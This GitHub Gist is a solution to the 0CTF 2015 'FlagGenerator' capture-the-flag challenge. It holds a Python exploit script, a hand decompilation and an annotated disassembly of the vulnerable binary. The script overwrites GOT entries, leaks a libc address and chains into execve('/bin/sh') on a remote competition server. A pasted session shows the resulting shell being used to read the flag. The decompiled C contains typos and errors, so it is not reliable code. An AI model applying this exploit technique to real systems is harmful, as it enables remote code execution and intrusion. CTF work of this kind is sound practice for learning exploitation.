Last active
August 29, 2015 14:17
-
-
Save hhc0null/4db2dde28a6e54659d4e to your computer and use it in GitHub Desktop.
0CTF 2015 Quals Exploit-FlagGenerator-250pts Writeup? Just exploit code?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import binascii | |
| import re | |
| import socket | |
| import struct | |
| import subprocess | |
| import sys | |
| import telnetlib | |
| import time | |
| def read_until(f, delim='\n'): | |
| data = "" | |
| while not data.endswith(delim): | |
| data += f.read(1) | |
| return data | |
| def connect(rhp=("202.112.26.106", 5149)): | |
| s = socket.create_connection(rhp) | |
| f = s.makefile('rw', bufsize=0) | |
| return s, f | |
| def interact(s): | |
| t = telnetlib.Telnet() | |
| t.sock = s | |
| print "[+] 4ll y0U n33D 15 5h3ll!!" | |
| t.interact() | |
| def p(x, t="<I"): | |
| return struct.pack(t, x) | |
| def u(x, t="<I"): | |
| return struct.unpack(t, x)[0] | |
| def unsigned(x): | |
| return u(p(x, t="<i"), t="<I") | |
| def overwrite(pairs, index=7): | |
| (addrs, datas) = pairs | |
| if len(addrs) != len(datas): | |
| sys.stderr.write("[!] number of `pairs', elements don't be matched in overwrite()\n") | |
| return "" | |
| payload = "" | |
| for addr in addrs: | |
| # A, A+2, B, B+2, C, C+2, ... | |
| payload += p(addr) + p(addr+2) | |
| dataset = map(lambda x: [x&0xffff, (x>>16)&0xffff], datas) | |
| dataset = sum(dataset, []) # it's a cool technique ;) | |
| num = -len(payload) | |
| prev = 0 | |
| for i, data in enumerate(dataset): | |
| data += num | |
| data = unsigned(data) if data < 0 else u(p(data, t="<H"), t="<H") | |
| payload += "%{}x%{}$hn%{}x".format(data, index+i, (0x10000 - data + num) % 0x10000) | |
| num = 0 | |
| return payload | |
| def message(message_type, message_body, value=None): | |
| text = "" | |
| if value: | |
| text = "[{}] {}: 0x{:08x}".format(message_type, message_body, value) | |
| else: | |
| text = "[{}] {}".format(message_type, message_body) | |
| print text | |
| rhp = ("localhost", 5149) | |
| rhp = ("202.112.26.106", 5149) | |
| dummy_address = 0xcafebabe # <- This is a """GEKI-MOTE""" point;) | |
| got___stack_chk_fail = 0x804b01c | |
| got_alarm = 0x804b018 | |
| got_printf = 0x804b010 | |
| plt_printf = 0x8048510 | |
| ret = 0x08048d90 #: ret ; | |
| lret = 0x80485d8 #: leave ; ret ; | |
| pret = 0x08048d8f #: pop ebp ; ret ; | |
| p2ret = 0x08048d8e #: pop edi ; pop ebp ; ret ; | |
| p3ret = 0x08048d8d #: pop esi ; pop edi ; pop ebp ; ret ; | |
| p4ret = 0x08048d8c #: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ; | |
| if rhp[0] == "localhost": | |
| offset_libc_alarm = 0x000b2a10 # T alarm | |
| offset_libc_execve = 0x000b3100 # W execve | |
| offset_libc__exit = 0x000b30e4 # T _exit | |
| offset_libc_rodata_bin_sh = 0x15e3a8 | |
| else: | |
| offset_libc_alarm = 0x000b54c0 # T alarm | |
| offset_libc_execve = 0x000b5be0 # W execve | |
| offset_libc__exit = 0x000b5bc4 # T _exit | |
| offset_libc_rodata_bin_sh = 0x160a24 | |
| # stage1, leak a alarm address from GOT and calculate the libc base address. | |
| payload = "" | |
| # restructuring a GOT entries... | |
| payload += p(lret) # __stack_chk_fail@plt | |
| payload += p(0x80484f6) # strcpy@plt | |
| payload += p(0x8048506) # malloc@plt | |
| payload += p(0x8048516) # printf@plt | |
| payload += p(0x8048526) # __gmon_start__@plt | |
| payload += p(0x8048536) # __libc_start_main@plt | |
| payload += p(0x8048546) # setvbuf@plt | |
| payload += p(0x8048556) # snprintf@plt | |
| payload += p(0x8048566) # atoi@plt | |
| payload += "H"*76 | |
| payload += p(dummy_address)*2 | |
| payload += p(pret) | |
| payload += p(got___stack_chk_fail) | |
| # ---- 0x110(filled up buffer) | |
| # printf(got_alarm); | |
| payload += p(plt_printf) | |
| payload += p(pret) | |
| payload += p(got_alarm) | |
| payload += p(pret) | |
| payload += p(got_printf) | |
| payload += p(0x80486cb) # a read() gadget | |
| payload += p(lret) | |
| payload += p(got_printf) | |
| payload += p(0x60) | |
| message("*", "payload[{}]: {}".format(len(payload), repr(payload))) | |
| assert(len(payload) <= 0x100) | |
| s, f = connect(rhp) | |
| read_until(f, ": ") | |
| f.write("1\n") | |
| f.write(payload+'\n') | |
| read_until(f, ": ") | |
| f.write("4\n") | |
| data = read_until(f)[:4] | |
| libc_base = u(data) - offset_libc_alarm | |
| message("+", "libc base", libc_base) | |
| def libc(offset): | |
| return libc_base + offset | |
| # stage2, ret2libc-chain. | |
| payload = "" | |
| payload += p(ret) | |
| # execve("/bin/sh", NULL, NULL); exit(EXIT_SUCCESS); | |
| payload += p(libc(offset_libc_execve)) | |
| payload += p(libc(offset_libc__exit)) | |
| payload += p(libc(offset_libc_rodata_bin_sh)) | |
| payload += p(0) | |
| payload += p(0) | |
| f.write(payload) | |
| time.sleep(1) | |
| interact(s) | |
| """ | |
| % ./exploit.py | |
| [*] payload[164]: '\xd8\x85\x04\x08\xf6\x84\x04\x08\x06\x85\x04\x08\x16\x85\x04\x08&\x85\x04\x086\x85\x04\x08F\x85\x04\x08V\x85\x04\x08f\x85\x04\x08HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH\xbe\xba\xfe\xca\xbe\xba\xfe\xca\x8f\x8d\x04\x08\x1c\xb0\x04\x08\x10\x85\x04\x08\x8f\x8d\x04\x08\x18\xb0\x04\x08\x8f\x8d\x04\x08\x10\xb0\x04\x08\xcb\x86\x04\x08\xd8\x85\x04\x08\x10\xb0\x04\x08`\x00\x00\x00' | |
| [+] libc base: 0xf757e000 | |
| [+] 4ll y0U n33D 15 5h3ll!! | |
| id | |
| uid=1001(flagen) gid=1001(flagen) groups=1001(flagen) | |
| ls / | |
| bin | |
| boot | |
| dev | |
| etc | |
| home | |
| initrd.img | |
| initrd.img.old | |
| lib | |
| lib64 | |
| lost+found | |
| media | |
| mnt | |
| opt | |
| proc | |
| root | |
| run | |
| sbin | |
| srv | |
| sys | |
| tmp | |
| usr | |
| var | |
| vmlinuz | |
| vmlinuz.old | |
| cd /home/flagen | |
| ls | |
| flag | |
| flagen | |
| cat flag | |
| 0ctf{delicious_stack_cookie_generates_flag} | |
| echo "I GOT FLAG <3<3" | |
| I GOT FLAG <3<3 | |
| exit | |
| *** Connection closed by remote host ***`' | |
| """ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| void sub_804866d() | |
| { | |
| setvbuf(stdin, NULL, _IONBUF, 0); | |
| setvbuf(stdout, NULL, _IONBUF, 0); | |
| alarm(60); | |
| } | |
| int sub_80486cb(char *arg0, int arg1) | |
| { | |
| // Local variables. | |
| int ebp_10h; | |
| int ebp_0ch; | |
| if(arg1 <= 0) { | |
| return 0; | |
| } | |
| for(ebp_10h = 0; ebp_10h < arg1 - 1; ebp_10h++) { | |
| ebp_0ch = read(STDIN_FILENO, &arg0[ebp_10h], 1); | |
| if(ebp_0ch <= 0 || arg0[ebp_10h] == '\n') break; | |
| // ->> | |
| } | |
| arg0[ebp_10h] = '\0'; | |
| return ebp_10h; | |
| } | |
| int sub_804873e() | |
| { | |
| // Local variables. | |
| char ebp_2ch[0x20]; | |
| sub_80486cb(ebp_2ch, 0x20); | |
| retunr atoi(ebp_2ch); | |
| } | |
| void sub_8048780(char *arg0) | |
| { | |
| // Local variables. | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| strcpy(ebp_10ch, arg0); | |
| for(ebp_110h = ebp_10ch; *ebp_110h != '\0'; ebp_110h++) { | |
| if(!('a' <= *ebp_110h || *ebp_110h <= 'z')) continue; | |
| *ebp_110h &= 0xffffffdf; | |
| } | |
| strcpy(arg0, ebp_10ch); | |
| } | |
| void sub_8048823(char *arg0) | |
| { | |
| // Local variables. | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| strcpy(ebp_10ch, arg0); | |
| for(ebp_110h = ebp_10ch; *ebp_110h != '\0'; ebp_110h++) { | |
| if(!('A' <= *ebp_110h || *ebp_110h <= 'Z')) continue; | |
| *ebp_110h |= 0x20; | |
| } | |
| strcpy(arg0, ebp_10ch); | |
| } | |
| void sub_80488c6(char *arg0) | |
| { | |
| // Local variables. | |
| char *ebp_114h; | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| unsigned int *val0; | |
| ebp_114h = &ebp_10ch; | |
| for(ebp_110h = arg0; *ebp_110h != '\0'; ebp_110h++) { | |
| switch(*ebp_110h) { | |
| case 'A': | |
| case 'a': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '4'; | |
| break; | |
| case 'B': | |
| case 'b': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '8'; | |
| break; | |
| case 'E': | |
| case 'e': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '3'; | |
| break; | |
| case 'H': | |
| case 'h': | |
| // XXX: 1 character -> 3 characters(!) | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '1'; | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '-'; | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '1'; | |
| break; | |
| case 'I': | |
| case 'i': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '!'; | |
| break; | |
| case 'L': | |
| case 'l': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '1'; | |
| break; | |
| case 'O': | |
| case 'o': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '0'; | |
| break; | |
| case 'S': | |
| case 's': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '5'; | |
| break; | |
| case 'T': | |
| case 't': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '7'; | |
| break; | |
| case 'Z': | |
| case 'z': | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = '2'; | |
| default: | |
| val0 = ebp_114h; | |
| ebp_114h += 1; | |
| *val0 = (char)ebp_110h; | |
| } | |
| } | |
| *ebp_114h = '\0'; | |
| strcpy(arg0, ebp_10ch); // XXX: strcpy() is one of the vulnerable functions:( | |
| } | |
| void sub_8048a70(char *arg0) | |
| { | |
| // Local variables. | |
| char ebp_10ch[0x100]; | |
| snprintf(ebp_10ch, 0xff, "0ctf{%s", arg0); | |
| ebp_10ch[strlen(ebp_10ch)-1] = '}'; | |
| ebp_10ch[strlen(ebp_10ch)] = '\0'; | |
| strcpy(arg0, ebp_10ch); | |
| } | |
| sub_8048b03(int arg0) | |
| { | |
| // Local variables. | |
| char *ebp_0ch; | |
| ebp_0ch = malloc(arg0); | |
| sub_80486cb(ebp_0ch, arg0); | |
| return ebp_0ch; | |
| } | |
| int sub_8048b2e() | |
| { | |
| printf("== 0ops Flag Generator =="); | |
| printf("1. Input Flag"); | |
| printf("2. Uppercase"); | |
| printf("3. Lowercase"); | |
| printf("4. Leetify"); | |
| printf("5. Add Prefix"); | |
| printf("6. Output Flag"); | |
| printf("7. Exit "); | |
| printf("========================="); | |
| puts("Your choice: "); | |
| return sub_804873e(); | |
| } | |
| int main() | |
| { | |
| // Local variables. | |
| char *esp_18h; | |
| sub_804866d(); | |
| esp_18h = NULL; | |
| while(true) { | |
| esp_1ch = sub_8048b2e(); | |
| switch(ebp_1ch) { | |
| case 1: | |
| if(esp_18h != NULL) { | |
| free(esp_18h); | |
| } | |
| esp_18h = sub_8048b03(0x100); | |
| printf("Done."); | |
| break; | |
| case 2: | |
| if(esp_18h != NULL) { | |
| sub_8048780(esp_18h); | |
| } | |
| printf("Done."); | |
| break; | |
| case 3: | |
| if(esp_18h != NULL) { | |
| sub_8048823(esp_18h); | |
| } | |
| printf("Done."); | |
| break; | |
| case 4: | |
| if(esp_18h != NULL) { | |
| sub_80488c6(esp_18h); | |
| } | |
| printf("Done."); | |
| break; | |
| case 5: | |
| if(esp_18h != NULL) { | |
| sub_8048a70(esp_18h); | |
| } | |
| printf("Done."); | |
| break; | |
| case 6: | |
| if(esp_18h != NULL) { | |
| puts("The Flag is: %s\n", esp_18h); | |
| free(esp_18h); | |
| esp_18h = NULL: | |
| printf("Done."); | |
| } else { | |
| printf("You have to input flag first!"); | |
| } | |
| break; | |
| case 7: | |
| printf("Bye"); | |
| return 0; | |
| default: | |
| printf("Invalid!"); | |
| } | |
| } | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| flagen: file format elf32-i386 | |
| Disassembly of section .init: | |
| 08048460 <.init>: | |
| 8048460: 53 push %ebx | |
| 8048461: 83 ec 08 sub $0x8,%esp | |
| 8048464: e8 37 01 00 00 call 80485a0 <atoi@plt+0x40> | |
| 8048469: 81 c3 97 2b 00 00 add $0x2b97,%ebx | |
| 804846f: 8b 83 fc ff ff ff mov -0x4(%ebx),%eax | |
| 8048475: 85 c0 test %eax,%eax | |
| 8048477: 74 05 je 804847e <read@plt-0x22> | |
| 8048479: e8 a2 00 00 00 call 8048520 <__gmon_start__@plt> | |
| 804847e: 83 c4 08 add $0x8,%esp | |
| 8048481: 5b pop %ebx | |
| 8048482: c3 ret | |
| Disassembly of section .plt: | |
| 08048490 <read@plt-0x10>: | |
| 8048490: ff 35 04 b0 04 08 pushl 0x804b004 | |
| 8048496: ff 25 08 b0 04 08 jmp *0x804b008 | |
| 804849c: 00 00 add %al,(%eax) | |
| ... | |
| 080484a0 <read@plt>: | |
| 80484a0: ff 25 0c b0 04 08 jmp *0x804b00c | |
| 80484a6: 68 00 00 00 00 push $0x0 | |
| 80484ab: e9 e0 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 080484b0 <puts@plt>: | |
| 80484b0: ff 25 28 b0 04 08 jmp *0x804b028 | |
| 80484b6: 68 08 00 00 00 push $0x8 | |
| 80484bb: e9 d0 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 080484c0 <free@plt>: | |
| 80484c0: ff 25 14 b0 04 08 jmp *0x804b014 | |
| 80484c6: 68 10 00 00 00 push $0x10 | |
| 80484cb: e9 c0 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 080484d0 <alarm@plt>: | |
| 80484d0: ff 25 18 b0 04 08 jmp *0x804b018 | |
| 80484d6: 68 18 00 00 00 push $0x18 | |
| 80484db: e9 b0 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 080484e0 <__stack_chk_fail@plt>: | |
| 80484e0: ff 25 1c b0 04 08 jmp *0x804b01c | |
| 80484e6: 68 20 00 00 00 push $0x20 | |
| 80484eb: e9 a0 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 080484f0 <strcpy@plt>: | |
| 80484f0: ff 25 20 b0 04 08 jmp *0x804b020 | |
| 80484f6: 68 28 00 00 00 push $0x28 | |
| 80484fb: e9 90 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048500 <malloc@plt>: | |
| 8048500: ff 25 24 b0 04 08 jmp *0x804b024 | |
| 8048506: 68 30 00 00 00 push $0x30 | |
| 804850b: e9 80 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048510 <printf@plt>: | |
| 8048510: ff 25 10 b0 04 08 jmp *0x804b010 | |
| 8048516: 68 38 00 00 00 push $0x38 | |
| 804851b: e9 70 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048520 <__gmon_start__@plt>: | |
| 8048520: ff 25 2c b0 04 08 jmp *0x804b02c | |
| 8048526: 68 40 00 00 00 push $0x40 | |
| 804852b: e9 60 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048530 <__libc_start_main@plt>: | |
| 8048530: ff 25 30 b0 04 08 jmp *0x804b030 | |
| 8048536: 68 48 00 00 00 push $0x48 | |
| 804853b: e9 50 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048540 <setvbuf@plt>: | |
| 8048540: ff 25 34 b0 04 08 jmp *0x804b034 | |
| 8048546: 68 50 00 00 00 push $0x50 | |
| 804854b: e9 40 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048550 <snprintf@plt>: | |
| 8048550: ff 25 38 b0 04 08 jmp *0x804b038 | |
| 8048556: 68 58 00 00 00 push $0x58 | |
| 804855b: e9 30 ff ff ff jmp 8048490 <read@plt-0x10> | |
| 08048560 <atoi@plt>: | |
| 8048560: ff 25 3c b0 04 08 jmp *0x804b03c | |
| 8048566: 68 60 00 00 00 push $0x60 | |
| 804856b: e9 20 ff ff ff jmp 8048490 <read@plt-0x10> | |
| Disassembly of section .text: | |
| 08048570 <.text>: | |
| 8048570: 31 ed xor %ebp,%ebp | |
| 8048572: 5e pop %esi | |
| 8048573: 89 e1 mov %esp,%ecx | |
| 8048575: 83 e4 f0 and $0xfffffff0,%esp | |
| 8048578: 50 push %eax | |
| 8048579: 54 push %esp | |
| 804857a: 52 push %edx | |
| 804857b: 68 a0 8d 04 08 push $0x8048da0 | |
| 8048580: 68 30 8d 04 08 push $0x8048d30 | |
| 8048585: 51 push %ecx | |
| 8048586: 56 push %esi | |
| 8048587: 68 b3 8b 04 08 push $0x8048bb3 | |
| 804858c: e8 9f ff ff ff call 8048530 <__libc_start_main@plt> | |
| 8048591: f4 hlt | |
| 8048592: 66 90 xchg %ax,%ax | |
| 8048594: 66 90 xchg %ax,%ax | |
| 8048596: 66 90 xchg %ax,%ax | |
| 8048598: 66 90 xchg %ax,%ax | |
| 804859a: 66 90 xchg %ax,%ax | |
| 804859c: 66 90 xchg %ax,%ax | |
| 804859e: 66 90 xchg %ax,%ax | |
| 80485a0: 8b 1c 24 mov (%esp),%ebx | |
| 80485a3: c3 ret | |
| 80485a4: 66 90 xchg %ax,%ax | |
| 80485a6: 66 90 xchg %ax,%ax | |
| 80485a8: 66 90 xchg %ax,%ax | |
| 80485aa: 66 90 xchg %ax,%ax | |
| 80485ac: 66 90 xchg %ax,%ax | |
| 80485ae: 66 90 xchg %ax,%ax | |
| 80485b0: b8 4b b0 04 08 mov $0x804b04b,%eax | |
| 80485b5: 2d 48 b0 04 08 sub $0x804b048,%eax | |
| 80485ba: 83 f8 06 cmp $0x6,%eax | |
| 80485bd: 77 01 ja 80485c0 <atoi@plt+0x60> | |
| 80485bf: c3 ret | |
| 80485c0: b8 00 00 00 00 mov $0x0,%eax | |
| 80485c5: 85 c0 test %eax,%eax | |
| 80485c7: 74 f6 je 80485bf <atoi@plt+0x5f> | |
| 80485c9: 55 push %ebp | |
| 80485ca: 89 e5 mov %esp,%ebp | |
| 80485cc: 83 ec 18 sub $0x18,%esp | |
| 80485cf: c7 04 24 48 b0 04 08 movl $0x804b048,(%esp) | |
| 80485d6: ff d0 call *%eax | |
| 80485d8: c9 leave | |
| 80485d9: c3 ret | |
| 80485da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi | |
| 80485e0: b8 48 b0 04 08 mov $0x804b048,%eax | |
| 80485e5: 2d 48 b0 04 08 sub $0x804b048,%eax | |
| 80485ea: c1 f8 02 sar $0x2,%eax | |
| 80485ed: 89 c2 mov %eax,%edx | |
| 80485ef: c1 ea 1f shr $0x1f,%edx | |
| 80485f2: 01 d0 add %edx,%eax | |
| 80485f4: d1 f8 sar %eax | |
| 80485f6: 75 01 jne 80485f9 <atoi@plt+0x99> | |
| 80485f8: c3 ret | |
| 80485f9: ba 00 00 00 00 mov $0x0,%edx | |
| 80485fe: 85 d2 test %edx,%edx | |
| 8048600: 74 f6 je 80485f8 <atoi@plt+0x98> | |
| 8048602: 55 push %ebp | |
| 8048603: 89 e5 mov %esp,%ebp | |
| 8048605: 83 ec 18 sub $0x18,%esp | |
| 8048608: 89 44 24 04 mov %eax,0x4(%esp) | |
| 804860c: c7 04 24 48 b0 04 08 movl $0x804b048,(%esp) | |
| 8048613: ff d2 call *%edx | |
| 8048615: c9 leave | |
| 8048616: c3 ret | |
| 8048617: 89 f6 mov %esi,%esi | |
| 8048619: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi | |
| 8048620: 80 3d 84 b0 04 08 00 cmpb $0x0,0x804b084 | |
| 8048627: 75 13 jne 804863c <atoi@plt+0xdc> | |
| 8048629: 55 push %ebp | |
| 804862a: 89 e5 mov %esp,%ebp | |
| 804862c: 83 ec 08 sub $0x8,%esp | |
| 804862f: e8 7c ff ff ff call 80485b0 <atoi@plt+0x50> | |
| 8048634: c6 05 84 b0 04 08 01 movb $0x1,0x804b084 | |
| 804863b: c9 leave | |
| 804863c: f3 c3 repz ret | |
| 804863e: 66 90 xchg %ax,%ax | |
| 8048640: a1 10 af 04 08 mov 0x804af10,%eax | |
| 8048645: 85 c0 test %eax,%eax | |
| 8048647: 74 1f je 8048668 <atoi@plt+0x108> | |
| 8048649: b8 00 00 00 00 mov $0x0,%eax | |
| 804864e: 85 c0 test %eax,%eax | |
| 8048650: 74 16 je 8048668 <atoi@plt+0x108> | |
| 8048652: 55 push %ebp | |
| 8048653: 89 e5 mov %esp,%ebp | |
| 8048655: 83 ec 18 sub $0x18,%esp | |
| 8048658: c7 04 24 10 af 04 08 movl $0x804af10,(%esp) | |
| 804865f: ff d0 call *%eax | |
| 8048661: c9 leave | |
| 8048662: e9 79 ff ff ff jmp 80485e0 <atoi@plt+0x80> | |
| 8048667: 90 nop | |
| 8048668: e9 73 ff ff ff jmp 80485e0 <atoi@plt+0x80> | |
| void sub_804866d() | |
| { | |
| 804866d: 55 push %ebp | |
| 804866e: 89 e5 mov %esp,%ebp | |
| 8048670: 83 ec 18 sub $0x18,%esp | |
| 8048673: a1 60 b0 04 08 mov 0x804b060,%eax | |
| 8048678: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp) | |
| 804867f: 00 | |
| 8048680: c7 44 24 08 02 00 00 movl $0x2,0x8(%esp) | |
| 8048687: 00 | |
| 8048688: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) | |
| 804868f: 00 | |
| 8048690: 89 04 24 mov %eax,(%esp) | |
| 8048693: e8 a8 fe ff ff call 8048540 <setvbuf@plt> | |
| setvbuf(stdin, NULL, _IONBUF, 0); | |
| 8048698: a1 80 b0 04 08 mov 0x804b080,%eax | |
| 804869d: c7 44 24 0c 00 00 00 movl $0x0,0xc(%esp) | |
| 80486a4: 00 | |
| 80486a5: c7 44 24 08 02 00 00 movl $0x2,0x8(%esp) | |
| 80486ac: 00 | |
| 80486ad: c7 44 24 04 00 00 00 movl $0x0,0x4(%esp) | |
| 80486b4: 00 | |
| 80486b5: 89 04 24 mov %eax,(%esp) | |
| 80486b8: e8 83 fe ff ff call 8048540 <setvbuf@plt> | |
| setvbuf(stdout, NULL, _IONBUF, 0); | |
| 80486bd: c7 04 24 3c 00 00 00 movl $0x3c,(%esp) | |
| 80486c4: e8 07 fe ff ff call 80484d0 <alarm@plt> | |
| alarm(60); | |
| 80486c9: c9 leave | |
| 80486ca: c3 ret | |
| } | |
| int sub_80486cb(char *arg0, int arg1) | |
| { | |
| 80486cb: 55 push %ebp | |
| 80486cc: 89 e5 mov %esp,%ebp | |
| 80486ce: 83 ec 28 sub $0x28,%esp | |
| // Local variables. | |
| int ebp_10h; | |
| int ebp_0ch; | |
| 80486d1: 83 7d 0c 00 cmpl $0x0,0xc(%ebp) | |
| 80486d5: 7f 07 jg 80486de <atoi@plt+0x17e> | |
| if(arg1 <= 0) { | |
| 80486d7: b8 00 00 00 00 mov $0x0,%eax | |
| 80486dc: eb 5e jmp 804873c <atoi@plt+0x1dc> | |
| return 0; | |
| } | |
| 80486de: c7 45 f0 00 00 00 00 movl $0x0,-0x10(%ebp) | |
| 80486e5: eb 3c jmp 8048723 <atoi@plt+0x1c3> | |
| for(ebp_10h = 0; ebp_10h < arg1 - 1; ebp_10h++) { | |
| 80486e7: 8b 55 f0 mov -0x10(%ebp),%edx | |
| 80486ea: 8b 45 08 mov 0x8(%ebp),%eax | |
| 80486ed: 01 d0 add %edx,%eax | |
| 80486ef: c7 44 24 08 01 00 00 movl $0x1,0x8(%esp) | |
| 80486f6: 00 | |
| 80486f7: 89 44 24 04 mov %eax,0x4(%esp) | |
| 80486fb: c7 04 24 00 00 00 00 movl $0x0,(%esp) | |
| 8048702: e8 99 fd ff ff call 80484a0 <read@plt> | |
| 8048707: 89 45 f4 mov %eax,-0xc(%ebp) | |
| ebp_0ch = read(STDIN_FILENO, &arg0[ebp_10h], 1); | |
| 804870a: 83 7d f4 00 cmpl $0x0,-0xc(%ebp) | |
| 804870e: 7e 1e jle 804872e <atoi@plt+0x1ce> | |
| 8048710: 8b 55 f0 mov -0x10(%ebp),%edx | |
| 8048713: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048716: 01 d0 add %edx,%eax | |
| 8048718: 0f b6 00 movzbl (%eax),%eax | |
| 804871b: 3c 0a cmp $0xa,%al | |
| 804871d: 74 0f je 804872e <atoi@plt+0x1ce> | |
| if(ebp_0ch <= 0 || arg0[ebp_10h] == '\n') break; | |
| 804871f: 83 45 f0 01 addl $0x1,-0x10(%ebp) | |
| // ->> | |
| 8048723: 8b 45 0c mov 0xc(%ebp),%eax | |
| 8048726: 83 e8 01 sub $0x1,%eax | |
| 8048729: 3b 45 f0 cmp -0x10(%ebp),%eax | |
| 804872c: 7f b9 jg 80486e7 <atoi@plt+0x187> | |
| } | |
| 804872e: 8b 55 f0 mov -0x10(%ebp),%edx | |
| 8048731: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048734: 01 d0 add %edx,%eax | |
| 8048736: c6 00 00 movb $0x0,(%eax) | |
| arg0[ebp_10h] = '\0'; | |
| 8048739: 8b 45 f0 mov -0x10(%ebp),%eax | |
| 804873c: c9 leave | |
| 804873d: c3 ret | |
| return ebp_10h; | |
| } | |
| int sub_804873e() | |
| { | |
| 804873e: 55 push %ebp | |
| 804873f: 89 e5 mov %esp,%ebp | |
| 8048741: 83 ec 48 sub $0x48,%esp | |
| // Local variables. | |
| char ebp_2ch[0x20]; | |
| 8048744: 65 a1 14 00 00 00 mov %gs:0x14,%eax | |
| 804874a: 89 45 f4 mov %eax,-0xc(%ebp) | |
| 804874d: 31 c0 xor %eax,%eax | |
| 804874f: c7 44 24 04 20 00 00 movl $0x20,0x4(%esp) | |
| 8048756: 00 | |
| 8048757: 8d 45 d4 lea -0x2c(%ebp),%eax | |
| 804875a: 89 04 24 mov %eax,(%esp) | |
| 804875d: e8 69 ff ff ff call 80486cb <atoi@plt+0x16b> | |
| sub_80486cb(ebp_2ch, 0x20); | |
| 8048762: 8d 45 d4 lea -0x2c(%ebp),%eax | |
| 8048765: 89 04 24 mov %eax,(%esp) | |
| 8048768: e8 f3 fd ff ff call 8048560 <atoi@plt> | |
| 804876d: 8b 55 f4 mov -0xc(%ebp),%edx | |
| 8048770: 65 33 15 14 00 00 00 xor %gs:0x14,%edx | |
| 8048777: 74 05 je 804877e <atoi@plt+0x21e> | |
| 8048779: e8 62 fd ff ff call 80484e0 <__stack_chk_fail@plt> | |
| 804877e: c9 leave | |
| 804877f: c3 ret | |
| retunr atoi(ebp_2ch); | |
| } | |
| void sub_8048780(char *arg0) | |
| { | |
| 8048780: 55 push %ebp | |
| 8048781: 89 e5 mov %esp,%ebp | |
| 8048783: 81 ec 28 01 00 00 sub $0x128,%esp | |
| // Local variables. | |
| char *ebp_110h; | |
| char ebp_10ch[0x100]; | |
| 8048789: 65 a1 14 00 00 00 mov %gs:0x14,%eax | |
| 804878f: 89 45 f4 mov %eax,-0xc(%ebp) | |
| 8048792: 31 c0 xor %eax,%eax | |
| 8048794: 8b 45 08 mov 0x8(%ebp),%eax | |
| 8048797: 89 44 24 04 mov %eax,0x4(%esp) | |
| 804879b: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 80487a1: 89 04 24 mov %eax,(%esp) | |
| 80487a4: e8 47 fd ff ff call 80484f0 <strcpy@plt> | |
| strcpy(ebp_10ch, arg0); | |
| 80487a9: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax | |
| 80487af: 89 85 f0 fe ff ff mov %eax,-0x110(%ebp) | |
| 80487b5: eb 37 jmp 80487ee <atoi@plt+0x28e> | |
| for(ebp_110h = ebp_10ch; *ebp_110h != '\0'; ebp_110h++) { | |
| 80487b7: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80487bd: 0f b6 00 movzbl (%eax),%eax | |
| 80487c0: 3c 60 cmp $0x60,%al | |
| 80487c2: 7e 23 jle 80487e7 <atoi@plt+0x287> | |
| 80487c4: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80487ca: 0f b6 00 movzbl (%eax),%eax | |
| 80487cd: 3c 7a cmp $0x7a,%al | |
| 80487cf: 7f 16 jg 80487e7 <atoi@plt+0x287> | |
| if(!('a' <= *ebp_110h || *ebp_110h <= 'z')) continue; | |
| 80487d1: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80487d7: 0f b6 00 movzbl (%eax),%eax | |
| 80487da: 83 e0 df and $0xffffffdf,%eax | |
| 80487dd: 89 c2 mov %eax,%edx | |
| 80487df: 8b 85 f0 fe ff ff mov -0x110(%ebp),%eax | |
| 80487e5: 88 10 mov %dl,(%eax) | |
| *ebp_110h &= 0xffffffdf; | |
| 80487e7: 83 85 f0 fe ff ff 01 addl $0x1,-0x110(%ebp) | |
| // ->> | |
